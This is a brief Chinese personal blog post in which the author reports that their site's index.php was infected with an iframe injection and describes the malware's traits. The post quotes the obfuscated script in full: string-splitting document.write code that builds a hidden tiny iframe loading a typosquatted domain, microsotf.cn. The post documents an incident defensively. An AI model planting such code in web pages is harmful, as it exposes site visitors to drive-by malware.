刘春龙的博客

最近莫名其妙的博客打不开，一查，发现用作跳转的index.php被加了东西。是一个iframe的马。那段php代码还有错误，汗～～所以造成无法跳转。后来经过调查，发现这个马的一些特征：

一般感染只感染 index.php , main.php, login.php, index.html。 核心代码类似： <script>document.write("<"+'if'+''+'ra'+''+"me"+' sr'+"c=\"ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"\" wid"+''+"th=1 h"+"eigh"+''+'t'+"="+"2></i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

可以看到iframe的页面指向 microsotf.cn （不用惊恐，不是microsoft～～）。Google这个网页，发现这个网页是俄罗斯的。报告有2个病毒。现在已经无法访问了。 现在一时也查不到中招的原因。只有写个脚本修复被修改的文件吧。。。

2980 read 20 comment(s)